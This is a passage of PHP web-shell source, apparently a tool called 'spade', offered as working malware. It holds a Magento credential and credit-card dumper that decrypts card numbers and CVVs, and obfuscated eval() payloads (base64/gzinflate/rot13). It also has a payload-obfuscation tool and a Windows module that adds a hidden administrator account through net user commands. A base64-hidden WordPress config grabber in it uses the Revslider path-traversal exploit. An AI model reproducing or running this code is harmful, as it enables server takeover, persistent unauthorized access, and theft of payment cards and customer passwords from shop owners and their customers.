  1470. echo'<br><br>
  1471. ====================================================================<br>
  1472. [ Authorizenet ] <br>
  1473. ====================================================================<br>';
  1474. }
  1475. echo "
  1476. <table border='1' align='center' >
  1477. <tr>
  1478. <td>no</td>
  1479. <td>user</td>
  1480. <td>pass</td>
  1481. </tr>";
  1482. $no = 1;
  1483. while($vx = mysql_fetch_array($query)) {
  1484. $user = $crypto->decrypt($vx['user']);
  1485. $pass = $crypto->decrypt($vx['pass']);
  1486.  
  1487.  
  1488. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  1489. $no++;
  1490. }
  1491. echo "</table><br>";
  1492. }
  1493. //=========================================================================================================
  1494. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  1495. if(mysql_num_rows($query_smtp) != 0){
  1496. if (!$query_smtp){
  1497. echo "<center><b>Gagal</b></center>";
  1498. }else{
  1499. echo'<br><br>
  1500. ====================================================================<br>
  1501. [ SMTP ] <br>
  1502. ====================================================================<br>';
  1503. }
  1504. echo "
  1505. <table border='1' align='center' >
  1506. <tr>
  1507. <td>no</td>
  1508. <td>host</td>
  1509. <td>port</td>
  1510. <td>user</td>
  1511. <td>pass</td>
  1512. </tr>";
  1513. $no = 1;
  1514. $batas = 0;
  1515. while($rows = mysql_fetch_array($query_smtp)) {
  1516. $smtphost = $rows[0];
  1517. $smtpport = $rows[1];
  1518. $smtpuser = $rows[2];
  1519. $smtppass = $rows[3];
  1520. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  1521. $no++;
  1522. }
  1523. echo "</table><br>";
  1524. }
  1525. //=========================================================================================================
  1526. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  1527. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  1528. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  1529. echo'<br><br>
  1530. ====================================================================<br>
  1531. [ Credit Card ] <br>
  1532. ====================================================================<br>';
  1533. echo "
  1534. <table border='1' align='left' >
  1535. <tr>
  1536. <td>no</td>
  1537. <td>Date</td>
  1538. <td>Credit Owner</td>
  1539. <td>method</td>
  1540. <td>Credit Number</td>
  1541. <td>Credit Exp</td>
  1542. <td>CVV</td>
  1543. <td>Address</td>
  1544. </tr>";
  1545. $no = 1;
  1546. $batas = 0;
  1547. while($vx = mysql_fetch_array($query)){
  1548. $date = $vx['updated_at'];
  1549. $cc_owner = $vx['cc_owner'];
  1550. $method = $vx['method'];
  1551. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  1552. $exp = $vx['exp'];
  1553. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  1554. $Billing_Address = $vx['Billing Address'];
  1555. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  1556. $batas = $no++;
  1557. }
  1558.  
  1559. while($vx2 = mysql_fetch_array($query2)){
  1560. $batas +=1;
  1561. $cc_owner = $vx2['cc_owner'];
  1562. $method = $vx2['method'];
  1563. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  1564. $exp = $vx2['exp'];
  1565. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  1566. $Billing_Address = $vx2['Billing Address'];
  1567. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  1568. $batas++;
  1569. }
  1570.  
  1571. echo "</table><br>";
  1572. }
  1573. //=========================================================================================================
  1574. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  1575. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  1576.  
  1577.  
  1578. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  1579. if (!$query){
  1580. echo "<center><b>Gagal</b></center>";
  1581. }else{
  1582. echo'<br><br>
  1583. ====================================================================<br>
  1584. [ Customer ] <br>
  1585. ====================================================================<br>';
  1586. }
  1587. echo "
  1588. <table border='1' align='center' >
  1589. <tr>
  1590. <td>no</td>
  1591. <td>user</td>
  1592. <td>pass</td>
  1593. </tr>";
  1594. $no = 1;
  1595. $batas = 0;
  1596. while($vx = mysql_fetch_array($query)) {
  1597. $user = $vx['email'];
  1598. $pass = $vx['value'];
  1599. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  1600. $batas = $no++;
  1601. }
  1602.  
  1603. if(mysql_num_rows($query2) != 0 && ($query2)){
  1604. while($vx2 = mysql_fetch_array($query2)){
  1605. $user = $vx2['customer_email'];
  1606. $pass = $crypto->decrypt($vx2['password_hash']);
  1607. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  1608. $batas +=1;
  1609. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  1610. $batas++;
  1611. }
  1612. }
  1613. }
  1614.  
  1615. echo "</table><br>";
  1616. }
  1617. //=========================================================================================================
  1618. }
  1619. }
  1620. function save($format,$data){
  1621. $fp = fopen($format, 'a');
  1622. fwrite($fp, $data);
  1623. fclose($fp);
  1624. }
  1625. function cekbase64($string){
  1626. $decoded = base64_decode($string, true);
  1627. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  1628. if(!base64_decode($string, true)) return false;
  1629. if(base64_encode($decoded) != $string) return false;
  1630. return true;//nilai return 1 jika true
  1631. }
  1632. //----untuk decode password ---/
  1633. class Varien_Crypt_Mcrypt{
  1634. /**
  1635. * Constuctor
  1636. *
  1637. * @param array $data
  1638. */
  1639. public function __construct()
  1640. {
  1641. }
  1642.  
  1643. /**
  1644. * Initialize mcrypt module
  1645. *
  1646. * @param string $key cipher private key
  1647. * @return Varien_Crypt_Mcrypt
  1648. */
  1649. public function init($key)
  1650. {
  1651. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  1652. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  1653. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  1654.  
  1655. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  1656. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  1657. return null;
  1658. }
  1659.  
  1660. mcrypt_generic_init($this->handler, $key, $iv);
  1661.  
  1662. return $this;
  1663. }
  1664.  
  1665. /**
  1666. * Encrypt data
  1667. *
  1668. * @param string $data source string
  1669. * @return string
  1670. */
  1671. public function encrypt($data)
  1672. {
  1673. if (!$this->handler) {
  1674. //throw new Varien_Exception('Crypt module is not initialized.');
  1675. return null;
  1676. }
  1677. if (strlen($data) == 0) {
  1678. return $data;
  1679. }
  1680. return base64_encode(mcrypt_generic($this->handler, $data));
  1681. }
  1682.  
  1683. /**
  1684. * Decrypt data
  1685. *
  1686. * @param string $data encrypted string
  1687. * @return string
  1688. */
  1689. public function decrypt($data)
  1690. {
  1691. if (!$this->handler) {
  1692. //throw new Varien_Exception('Crypt module is not initialized.');
  1693. return null;
  1694. }
  1695. if (strlen($data) == 0) {
  1696. return $data;
  1697. }
  1698. return mdecrypt_generic($this->handler, base64_decode($data));
  1699. }
  1700.  
  1701.  
  1702. /**
  1703. * Desctruct cipher module
  1704. *
  1705. */
  1706. public function __destruct()
  1707. {
  1708. if ($this->handler) {
  1709. $this->_reset();
  1710. }
  1711. }
  1712.  
  1713. protected function _reset()
  1714. {
  1715. mcrypt_generic_deinit($this->handler);
  1716. mcrypt_module_close($this->handler);
  1717. }
  1718. }
  1719. }elseif($_GET['do'] == 'zip') {
  1720. echo "<center><h1 class='titulo'>ZIP MENU</h1>";
  1721. function rmdir_recursive($dir) {
  1722. foreach(scandir($dir) as $file) {
  1723. if ('.' === $file || '..' === $file) continue;
  1724. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1725. else unlink("$dir/$file");
  1726. }
  1727. rmdir($dir);
  1728. }
  1729. if($_FILES["zip_file"]["name"]) {
  1730. $filename = $_FILES["zip_file"]["name"];
  1731. $source = $_FILES["zip_file"]["tmp_name"];
  1732. $type = $_FILES["zip_file"]["type"];
  1733. $name = explode(".", $filename);
  1734. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1735. foreach($accepted_types as $mime_type) {
  1736. if($mime_type == $type) {
  1737. $okay = true;
  1738. break;
  1739. }
  1740. }
  1741. $continue = strtolower($name[1]) == 'zip' ? true : false;
  1742. if(!$continue) {
  1743. $message = "Itu Bukan Zip , , GOBLOK COK";
  1744. }
  1745. $path = dirname(__FILE__).'/';
  1746. $filenoext = basename ($filename, '.zip');
  1747. $filenoext = basename ($filenoext, '.ZIP');
  1748. $targetdir = $path . $filenoext;
  1749. $targetzip = $path . $filename;
  1750. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  1751. mkdir($targetdir, 0777);
  1752. if(move_uploaded_file($source, $targetzip)) {
  1753. $zip = new ZipArchive();
  1754. $x = $zip->open($targetzip);
  1755. if ($x === true) {
  1756. $zip->extractTo($targetdir);
  1757. $zip->close();
  1758.  
  1759. unlink($targetzip);
  1760. }
  1761. $message = "<b>Sukses Gan :)</b>";
  1762. } else {
  1763. $message = "<b>Error Gan :(</b>";
  1764. }
  1765. }
  1766. echo '<table style="width:100%" border="1">
  1767. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1768. <label>Zip File : <input type="file" name="zip_file" /></label>
  1769. <input type="submit" name="submit" value="Upload And Unzip" />
  1770. </form>';
  1771. if($message) echo "<p>$message</p>";
  1772. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/spade_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1773. if($_POST['backup']){
  1774. $save=$_POST['save'];
  1775. function Zip($source, $destination)
  1776. {
  1777. if (extension_loaded('zip') === true)
  1778. {
  1779. if (file_exists($source) === true)
  1780. {
  1781. $zip = new ZipArchive();
  1782.  
  1783. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1784. {
  1785. $source = realpath($source);
  1786.  
  1787. if (is_dir($source) === true)
  1788. {
  1789. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1790.  
  1791. foreach ($files as $file)
  1792. {
  1793. $file = realpath($file);
  1794.  
  1795. if (is_dir($file) === true)
  1796. {
  1797. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1798. }
  1799.  
  1800. else if (is_file($file) === true)
  1801. {
  1802. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1803. }
  1804. }
  1805. }
  1806.  
  1807. else if (is_file($source) === true)
  1808. {
  1809. $zip->addFromString(basename($source), file_get_contents($source));
  1810. }
  1811. }
  1812.  
  1813. return $zip->close();
  1814. }
  1815. }
  1816.  
  1817. return false;
  1818. }
  1819. Zip($_POST['dir'],$save);
  1820. echo "Done , Save To <b>$save</b>";
  1821. }
  1822. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/spade_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1823. if($_POST['extrak']){
  1824. $save=$_POST['save'];
  1825. $zip = new ZipArchive;
  1826. $res = $zip->open($_POST['dir']);
  1827. if ($res === TRUE) {
  1828. $zip->extractTo($save);
  1829. $zip->close();
  1830. echo 'Succes , Location : <b>'.$save.'</b>';
  1831. } else {
  1832. echo 'Gagal Mas :( Ntahlah !';
  1833. }
  1834. }
  1835. echo '</tr></table>';
  1836. }elseif($_GET['do'] == 'shellchk') {
  1837. echo "<center><h1 class='titulo'>SHELL CHECKER</h1></center><br>";
  1838. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1839. } elseif($_GET['do'] == 'loghunter'){
  1840. echo "<center><h1 class='titulo'>LOG HUNTER</h1></center><br>";
  1841. eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));
  1842. }elseif($_GET['do'] == 'endec'){
  1843. $text = $_POST['code'];
  1844. echo "<center><h1 class='titulo'>SCRIPT ENCODE/DECODE</h1><br>
  1845. <form method='post'><br>
  1846. <textarea placeholder='Enter Text to Encrypt/Decrypt' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
  1847. <select class='inputz' size='1' name='ope'>
  1848. <option value='urlencode'>url</option>
  1849. <option value='json'>json</option>
  1850. <option value='ur'>convert_uu</option>
  1851. <option value='base64'>Base64</option>
  1852. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  1853. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
  1854. <option value='coeg'>gzinflate - base64</option>
  1855. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
  1856. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
  1857. <option value='str2'>str_rot13 - base64</option>
  1858. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  1859. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  1860. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 - base64</option>
  1861. <option value='gzpress'>gzcompress - base64</option>
  1862. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  1863. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  1864. </form></center>";
  1865. $submit = $_POST['submit'];
  1866. if (isset($submit)){
  1867. $op = $_POST["ope"];
  1868. switch ($op) {case 'base64': $codi=base64_encode($text);
  1869. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1870. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1871. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
  1872. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
  1873. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
  1874. break;case 'urlencode' : $codi=rawurlencode($text);
  1875. break;case 'ur' : $codi=convert_uuencode($text);
  1876. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1877. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1878. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1879. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1880. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1881. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  1882. break;default:break;}}
  1883. $submit = $_POST['submits'];
  1884.  
  1885. if(isset($submit)){
  1886. $op = $_POST['ope'];
  1887. switch($op){
  1888. case 'base64': $codi = base64_decode($text);
  1889. break; case 'str' : $codi = str_rot13(gzinflate(str_rot13(base64_decode($text))));
  1890. break; case 'gzinflate' : $codi = str_rot13(gzinflate(base64_decode($text)));
  1891. break; case 'coeg' : $codi = gzinflate(base64_decode($text));
  1892. break; case 'base6416x' : $codi = base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
  1893. break; case 'super' : $codi = str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
  1894. break; case 'urldecode' : $codi = rawurldecode($text);
  1895. break; case 'ur' : $codi = convert_uudecode($text);
  1896. break;case 'json' : $codi=utf8_decode(json_decode($text));
  1897. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1898. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1899. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1900. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1901. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  1902. break;default:break;}}
  1903. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
  1904. fwrite($myfile, $codi);
  1905. fclose($myfile);
  1906. echo "<center><div id='kotakan'><br>
  1907. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
  1908. }elseif($_GET['do'] == 'krdp2') {
  1909. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1910. echo "<center><h1 class='titulo'>K-RDP V.2 SHELL</h1></center><br>";
  1911. echo "<center>STATUS<br>$status_work</center><br><br><div id='result'>
  1912. <center><form action='' method='post'>
  1913. <input type='text' name='username' placeholder='Username' value='spade'>
  1914. <input type='text' name='password' placeholder='Password' value='spade'>
  1915. <input type='submit' name='shc_krdp' value='Submit'>
  1916. </form></center>
  1917. <pre>";
  1918. if($_POST['shc_krdp']){
  1919. echo "<center>";
  1920. $krdp_user = $_POST['username'];
  1921. $krdp_password = $_POST['password'];
  1922. $cmd_cek_user = shell_exec('net user');
  1923. if(preg_match($krdp_user,$cmd_cek_user)){
  1924. echo "$krdp_user already available";
  1925. }else {
  1926. $admin_list = array(
  1927. 'Administrators',
  1928. 'Administrator',
  1929. 'Administrateur',
  1930. 'admins',
  1931. 'sadmin',
  1932. 'Administrador',
  1933. 'admin',
  1934. );
  1935. if(shell_exec('net user $krdp_user $krdp_password /add')){
  1936. echo "[+] USER : <font color=lime>$krdp_user | $krdp_password</font><br>";
  1937. foreach ($admin_list as $key => $admins_list) {
  1938. if(shell_exec('net localgroup $admins_list $r_user /add')){
  1939. echo "[+] localgroup : <font color=lime>$admins_list</font><br>";
  1940. }else{
  1941. echo "[+] <font color=red>Errors On localgroup $admins_list</font><br>";
  1942. }
  1943. }echo "[INFO] Connect to IP Computer (RDP) <font color=lime>".$s_server_ip."</font><br>";
  1944. echo '<hr>[NET USER INFO]<br>'.shell_exec('net user');
  1945. }else{
  1946. echo "[+] Username : <font color=red>$krdp_user </font>| Password : <font color=red>$krdp_password , Failed to Add</font><br>";
  1947. }
  1948. }
  1949. }
  1950. echo"</pre>
  1951. </div></center>";
  1952. }else{ echo "<font color='red'>This Feature Supports Window Server Only!</font>";}
  1953. }elseif($_GET['do'] == 'revs'){
  1954. eval(base64_decode("ZWNobyAnPGNlbnRlcj48aDEgY2xhc3M9InRpdHVsbyI+U1BBREUgV1AgQ09ORklHIEdSQUJCRVI8L2gxPjxicj4KICAgIDxwMT5CZSBNaW5kZnVsbCB0aGF0IHRvIHN1Ym1pdCBhIFZhbGlkIFVSTCB3aXRoIDxmb250IGNvbG9yPSJyZWQiPmh0dHA6Ly88L2ZvbnQ+IGFuZCA8Zm9udCBjb2xvcj0icmVkIj4vPC9mb250PiE8YnI+PGk+ZWc6IGh0dHA6Ly93ZWJzaXRlLmNvbS8gPC9pPjxicj48Yj5ET1JLOiA8YSBocmVmPSJodHRwczovL3d3dy5nb29nbGUuY29tLyNxPXJldnNsaWRlci5waHArJTIySW5kZXgrb2YlMjIiIHRhcmdldD0iX0JMQU5LIj5yZXZzbGlkZXIucGhwICJJbmRleCBPZiI8L2E+PC9iPjwvcDE+PGJyPgogICAgICAgIDxmb3JtIG1ldGhvZD0iUE9TVCI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJsaW5rIiBwbGFjZWhvbGRlcj0iaHR0cHM6Ly93b3JkcHJlc3MuY29tLyIgcmVxdWlyZWQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdldCBDb25maWciLz4KICAgICAgICA8L2Zvcm0+JzsKICAgICAgICAKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydsaW5rJ10pICYmICghZW1wdHkoJF9QT1NUWydsaW5rJ10pKSl7CiAgICAgICAgICAgICAgICAkbGkgPSAkX1BPU1RbJ2xpbmsnXTsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb250IGNvbG9yPSdibHVlJz5TYW5pdGl6aW5nIFN0cmluZyAuIC4gLiAuIDwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBzbGVlcCgyKTsgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICRsaW4gPSBodG1sc3BlY2lhbGNoYXJzKCRsaSk7CiAgICAgICAgICAgICAgICAkbGluayA9IGZpbHRlcl92YXIoJGxpbiwgRklMVEVSX1NBTklUSVpFX1NUUklORyk7CiAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nZ3JlZW4nPlNhbml0YXppb24gU3VjY2VzczwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nYmx1ZSc+VmFsaWRhdGluZyBVUkwgLiAuIC4gLjwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBzbGVlcCgzKTsKCiAgICAgICAgICAgICAgICBpZiAoIXByZWdfbWF0Y2goIi9cYig/Oig/Omh0dHBzP3xmdHB8aHR0cD8pOlwvXC98d3d3XC4pWy1hLXowLTkrJkAjXC8lPz1+X3whOiwuO10qWy1hLXowLTkrJkAjXC8lPX5ffF0vaSIsJGxpbmspKSB7CiAgICAgICAgICAgICAgICAgICAgZWNobyAiPGZvbnQgY29sb3I9J3JlZCc+U3RyaW5nIGlzIG5vdCBhIFVSTCEhPC9mb250PiwgfiBUcnkgQWdhaW4gTGF0ZXIhPC9icj4iOwogICAgICAgICAgICAgICAgICAgIGVjaG8gIlN0cmluZzogIi4kbGluazsKICAgICAgICAgICAgICAgICAgICBleGl0KCk7CiAgICAgICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nZ3JlZW4nPlVSTCBWYWxpZGF0ZWQgU3VjY2Vzc2Z1bGx5LiAuIC4gLjwvZm9udD48YnIvPiI7CiAgICAgICAgICAgICAgICAgICAgZWNobyAiPGZvbnQgY29sb3I9J2JsdWUnPkRvd25sb2FkaW5nIFdQLUNvbmZpZyEuIC4gLiAuPC9mb250Pjxici8+IjsKICAgICAgICAgICAgICAgICAgICBzbGVlcCgyKTsKICAgICAgICAgICAgICAgICAgICAvL0l0IHdpbGwgZG93bmxvYWRlZCBkaXJlY3RseSBpZiBpdHMgVnVsbiBmb3IgUmV2c2xpZGVyIEV4cGxvaXQKICAgICAgICAgICAgICAgICAgICAkd3Bjb25maWcgPSAkbGluay4id3AtYWRtaW4vYWRtaW4tYWpheC5waHA/YWN0aW9uPXJldnNsaWRlcl9zaG93X2ltYWdlJmltZz0uLi93cC1jb25maWcucGhwIjsKICAgICAgICAgICAgICAgICAgICBlY2hvICI8YSBocmVmPSciLiR3cGNvbmZpZy4iJyB0YXJnZXQ9J19CTEFOSycgPkRvd25sb2FkIFdQLUNvbmZpZzwvYT4iOwogICAgICAgICAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+d2luZG93Lm9wZW4oJyIuJH